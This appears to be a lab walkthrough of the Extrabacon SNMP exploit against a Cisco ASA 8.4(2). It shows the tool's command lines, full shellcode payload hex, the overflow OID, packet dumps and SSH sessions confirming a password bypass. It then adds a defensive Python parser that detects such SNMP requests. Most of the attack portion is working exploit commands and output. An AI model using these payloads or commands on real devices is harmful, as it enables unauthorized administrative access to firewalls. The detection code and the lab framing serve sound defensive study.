# Extrabacon (EXBA) exploit


Normal ssh connection

```
# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
admin@asa's password: cisco
asa> enable
Password: cisco
asa# exit
```

Checking exploit support

```
# python extrabacon_1.1.0.1.py info -t asa:161 -c cisco
[+] Executing:  extrabacon_1.1.0.1.py info -t asa:161 -c cisco
[+] probing target via snmp
[+] Connecting to asa:161
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['cisco']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[0L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.3.0']>
   |   |  value     = <ASN1_TIME_TICKS[363400L]>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.5.0']>
   |   |  value     = <ASN1_STRING['asa.lab.net']>

[+] firewall uptime is 363400 time ticks, or 1:00:34

[+] firewall name is asa.lab.net

[+] target is running asa842, which is supported
Data stored in key file  : asa842
Data stored in self.vinfo: ASA842
```

Launching the exploit (disabling passwords)

```
# python extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-disable
[+] Executing:  extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-disable
Data stored in self.vinfo: ASA842
[+] generating exploit for exec mode pass-disable
[+] using shellcode in ./versions
[+] importing version-specific shellcode shellcode_asa842
[+] building payload for mode pass-disable
appended PMCHECK_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3
appended AAAADMINAUTH_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3
[+] random SNMP request-id 80055950
[+] fixing offset to payload 49
overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.67.123.122.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96.139.132.36.224.1.0.0.4.49.255.208.97.195.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.25.71.20.9.139.124.36.20.139.7.255.224.144
payload (133): bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3c3
EXBA msg (369):
[+] Connecting to asa:161
[+] packet 1 of 1
[+] 0000   30 82 01 6D 02 01 01 04  05 63 69 73 63 6F A5 82   0..m.....cisco..
[+] 0010   01 5F 02 04 04 C5 8E 8E  02 01 00 02 01 01 30 82   ._............0.
[+] 0020   01 4F 30 81 91 06 07 2B  06 01 02 01 01 01 04 81   .O0....+........
[+] 0030   85 BF A5 A5 A5 A5 B8 D8  A5 A5 A5 31 F8 BB A5 25   ...........1...%
[+] 0040   F6 AC 31 FB B9 A5 B5 A5  A5 31 F9 BA A2 A5 A5 A5   ..1......1......
[+] 0050   31 FA CD 80 EB 14 BF F0  8F 53 09 31 C9 B1 04 FC   1........S.1....
[+] 0060   F3 A4 E9 0C 00 00 00 5E  EB EC E8 F8 FF FF FF 31   .......^.......1
[+] 0070   C0 40 C3 BF A5 A5 A5 A5  B8 D8 A5 A5 A5 31 F8 BB   .@...........1..
[+] 0080   A5 B5 AD AD 31 FB B9 A5  B5 A5 A5 31 F9 BA A2 A5   ....1......1....
[+] 0090   A5 A5 31 FA CD 80 EB 14  BF E0 13 08 08 31 C9 B1   ..1..........1..
[+] 00a0   04 FC F3 A4 E9 0C 00 00  00 5E EB EC E8 F8 FF FF   .........^......
[+] 00b0   FF 31 C0 40 C3 C3 30 81  B8 06 81 B3 2B 06 01 04   .1.@..0.....+...
[+] 00c0   01 09 09 83 6B 01 03 03  01 01 05 09 5F 81 38 43   ....k......._.8C
[+] 00d0   7B 7A 81 2D 35 81 25 81  25 81 25 81 25 81 03 81   {z.-5.%.%.%.%...
[+] 00e0   6C 04 81 09 04 24 81 09  81 65 81 03 81 45 48 31   l....$...e...EH1
[+] 00f0   81 40 31 81 5B 81 33 10  31 81 76 81 3F 81 2E 81   .@1.[.3.1.v.?...
[+] 0100   2A 81 2A 81 2A 81 01 81  77 81 25 81 25 81 25 81   *.*.*...w.%.%.%.
[+] 0110   25 60 81 0B 81 04 24 81  60 01 00 00 04 31 81 7F   %`....$.`....1..
[+] 0120   81 50 61 81 43 81 10 81  10 81 10 81 10 81 10 81   .Pa.C...........
[+] 0130   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0140   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0150   10 81 10 81 10 81 10 81  10 81 10 81 10 19 47 14   ..............G.
[+] 0160   09 81 0B 7C 24 14 81 0B  07 81 7F 81 60 81 10 05   ...|$.......`...
[+] 0170   00                                                 .
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['cisco']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[80055950L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.4.1.99.12.36.1.1.1.116.114.97.112.104.111.115.116.46.99.105.115.99.111.46.49.57.50.46.49.54.56.46.49.46.51.51.46.50']>
   |   |  value     = <ASN1_STRING['']>
[+] received SNMP id 80055950, matches random id sent, likely success
[+] clean return detected
```

SSH connection with password disabled

```
# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
admin@asa's password: <enter>
asa> enable
Password: <enter>
asa# exit
```

Launching the exploit (re-enabling passwords)

```
# python extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-enable
[+] Executing:  extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-enable
Data stored in self.vinfo: ASA842
[+] generating exploit for exec mode pass-enable
[+] using shellcode in ./versions
[+] importing version-specific shellcode shellcode_asa842
[+] building payload for mode pass-enable
appended PMCHECK_ENABLE payload eb14bff08f530931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa0a5a5a531facd80
appended AAAADMINAUTH_ENABLE payload eb14bfe013080831c9b104fcf3a4e92f0000005eebece8f8ffffff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa0a5a5a531facd80
[+] random SNMP request-id 425184577
[+] fixing offset to payload 49
overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.67.123.122.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96.139.132.36.224.1.0.0.4.49.255.208.97.195.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.25.71.20.9.139.124.36.20.139.7.255.224.144
payload (133): eb14bff08f530931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa0a5a5a531facd80eb14bfe013080831c9b104fcf3a4e92f0000005eebece8f8ffffff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa0a5a5a531facd80c3
EXBA msg (369):
[+] Connecting to asa:161
[+] packet 1 of 1
[+] 0000   30 82 01 6D 02 01 01 04  05 63 69 73 63 6F A5 82   0..m.....cisco..
[+] 0010   01 5F 02 04 19 57 CD 41  02 01 00 02 01 01 30 82   ._...W.A......0.
[+] 0020   01 4F 30 81 91 06 07 2B  06 01 02 01 01 01 04 81   .O0....+........
[+] 0030   85 EB 14 BF F0 8F 53 09  31 C9 B1 04 FC F3 A4 E9   ......S.1.......
[+] 0040   2F 00 00 00 5E EB EC E8  F8 FF FF FF 55 31 C0 89   /...^.......U1..
[+] 0050   BF A5 A5 A5 A5 B8 D8 A5  A5 A5 31 F8 BB A5 25 F6   ..........1...%.
[+] 0060   AC 31 FB B9 A5 B5 A5 A5  31 F9 BA A0 A5 A5 A5 31   .1......1......1
[+] 0070   FA CD 80 EB 14 BF E0 13  08 08 31 C9 B1 04 FC F3   ..........1.....
[+] 0080   A4 E9 2F 00 00 00 5E EB  EC E8 F8 FF FF FF 55 89   ../...^.......U.
[+] 0090   E5 57 BF A5 A5 A5 A5 B8  D8 A5 A5 A5 31 F8 BB A5   .W..........1...
[+] 00a0   B5 AD AD 31 FB B9 A5 B5  A5 A5 31 F9 BA A0 A5 A5   ...1......1.....
[+] 00b0   A5 31 FA CD 80 C3 30 81  B8 06 81 B3 2B 06 01 04   .1....0.....+...
[+] 00c0   01 09 09 83 6B 01 03 03  01 01 05 09 5F 81 38 43   ....k......._.8C
[+] 00d0   7B 7A 81 2D 35 81 25 81  25 81 25 81 25 81 03 81   {z.-5.%.%.%.%...
[+] 00e0   6C 04 81 09 04 24 81 09  81 65 81 03 81 45 48 31   l....$...e...EH1
[+] 00f0   81 40 31 81 5B 81 33 10  31 81 76 81 3F 81 2E 81   .@1.[.3.1.v.?...
[+] 0100   2A 81 2A 81 2A 81 01 81  77 81 25 81 25 81 25 81   *.*.*...w.%.%.%.
[+] 0110   25 60 81 0B 81 04 24 81  60 01 00 00 04 31 81 7F   %`....$.`....1..
[+] 0120   81 50 61 81 43 81 10 81  10 81 10 81 10 81 10 81   .Pa.C...........
[+] 0130   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0140   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0150   10 81 10 81 10 81 10 81  10 81 10 81 10 19 47 14   ..............G.
[+] 0160   09 81 0B 7C 24 14 81 0B  07 81 7F 81 60 81 10 05   ...|$.......`...
[+] 0170   00                                                 .
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['cisco']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[425184577L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.4.1.99.12.36.1.1.1.116.114.97.112.104.111.115.116.46.99.105.115.99.111.46.49.57.50.46.49.54.56.46.49.46.51.51.46.50']>
   |   |  value     = <ASN1_STRING['']>
[+] received SNMP id 425184577, matches random id sent, likely success
[+] clean return detected
```

Normal SSH connection again, with the password re-enabled (an empty password is rejected)

```
# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
admin@asa's password: <enter>
Permission denied, please try again.
admin@asa's password:
```
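The two requests dumped above share a shape a network sensor can key on: a GetBulkRequest (PDU tag A5) whose sysDescr varbind carries a 133-byte OCTET STRING where a request normally sends NULL, followed by a varbind whose OID under 1.3.6.1.4.1.9.9.491 runs to 112 sub-identifiers. The following is an added example, not code from this page or from the tool: a minimal BER reader that decodes an SNMP v1/v2c message and flags both traits, exercised on two constructed packets; the 40-arc threshold, the community string and the dummy arcs in the sample are assumptions.

```python
"""Flag ExtraBacon-shaped SNMP requests. Added example, not code from the page or the tool: it
tests two traits of the GetBulk shown above, a varbind OID with far more sub-identifiers than
any real MIB object, and a request varbind carrying a non-NULL value (requests send NULL)."""
MAX_ARCS = 40                            # assumed threshold; genuine MIB OIDs are far shorter
REQUEST_PDUS = {0xA0, 0xA1, 0xA3, 0xA5}  # GetRequest, GetNextRequest, SetRequest, GetBulkRequest
def tlv(tag, body):
    """BER TLV with a definite short- or long-form length (used to build the samples)."""
    n = len(body)
    return bytes([tag]) + (bytes([n]) if n < 0x80 else b"\x82" + n.to_bytes(2, "big")) + body
def oid(arcs):
    """BER OBJECT IDENTIFIER: the first two arcs share one byte, the rest are base-128 encoded."""
    body = [arcs[0] * 40 + arcs[1]]
    for a in arcs[2:]:
        body += [0x80 | (a >> 7 * i) & 0x7F for i in range((a.bit_length() - 1) // 7, 0, -1)] + [a & 0x7F]
    return tlv(0x06, bytes(body))
def items(body):
    """Children of a constructed BER body as (tag, value) pairs; handles short and long lengths."""
    out, p = [], 0
    while p < len(body):
        tag, ln, p = body[p], body[p + 1], p + 2
        if ln & 0x80:                        # long form: low 7 bits give the length-of-length
            k = ln & 0x7F
            ln, p = int.from_bytes(body[p:p + k], "big"), p + k
        out.append((tag, body[p:p + ln]))
        p += ln
    return out

def inspect(packet):
    """Findings for one SNMP v1/v2c message; an empty list means nothing odd was seen."""
    [(_, msg)] = items(packet)
    _version, _community, (pdu_tag, pdu) = items(msg)
    _req_id, _f1, _f2, (_, vbl) = items(pdu)  # the two integer fields are skipped alike for every PDU type
    findings = []
    for _, vb in items(vbl):
        (_, oid_body), (vtag, _) = items(vb)
        n = 2 + sum(1 for b in oid_body[1:] if not b & 0x80)  # two arcs in byte 0, then one per final byte
        if n > MAX_ARCS:
            findings.append(f"oid with {n} sub-identifiers")
        if pdu_tag in REQUEST_PDUS and vtag != 0x05:
            findings.append(f"value tag 0x{vtag:02x} in request pdu 0x{pdu_tag:02x}")
    return findings

def request(pdu_tag, varbinds, community=b"cisco"):  # constructed v2c request: request-id 1, then 0 and 1 as on the page
    vbl = b"".join(tlv(0x30, oid(o) + v) for o, v in varbinds)
    pdu = tlv(0x02, b"\x01") + tlv(0x02, b"\x00") + tlv(0x02, b"\x01") + tlv(0x30, vbl)
    return tlv(0x30, tlv(0x02, b"\x01") + tlv(0x04, community) + tlv(pdu_tag, pdu))

BENIGN = request(0xA0, [([1, 3, 6, 1, 2, 1, 1, 1, 0], b"\x05\x00")])  # ordinary GET of sysDescr.0, NULL value
SUSPECT = request(0xA5, [([1, 3, 6, 1, 2, 1, 1, 1], tlv(0x04, b"A" * 133)),  # OCTET STRING where NULL belongs
                         ([1, 3, 6, 1, 4, 1, 9, 9, 491, 1, 3, 3, 1, 1, 5] + [9] * 97, b"\x05\x00")])  # 112 dummy arcs
```

Running `inspect(SUSPECT)` reports both the OCTET STRING value and the 112-arc OID, while `inspect(BENIGN)` returns nothing, so the same arc-count rule also leaves the `info` probe shown earlier (three short MIB-2 OIDs) alone.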

References

https://blog.silentsignal.eu/2016/08/25/bake-your-own-extrabacon/
